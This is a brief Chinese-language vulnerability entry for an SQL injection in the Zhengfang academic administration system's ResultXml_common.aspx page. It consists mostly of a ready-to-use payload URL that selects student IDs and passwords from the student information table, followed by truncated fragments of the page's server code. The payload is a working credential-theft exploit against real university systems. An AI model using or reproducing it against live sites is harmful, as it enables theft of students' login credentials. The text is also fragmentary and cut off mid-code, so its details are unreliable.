正方教务系统 ResultXml_common.aspx SQL 注入漏洞

Payload: /ResultXmlcommon.aspx?k=%&column='username='||xh||''||'passwd='||mm||''&table=xsjbxxb+where+rownum"; xml = xml + "" + dr0.ToString + ""; dr.Close; comm.Dispose; conn.Close; xml = x...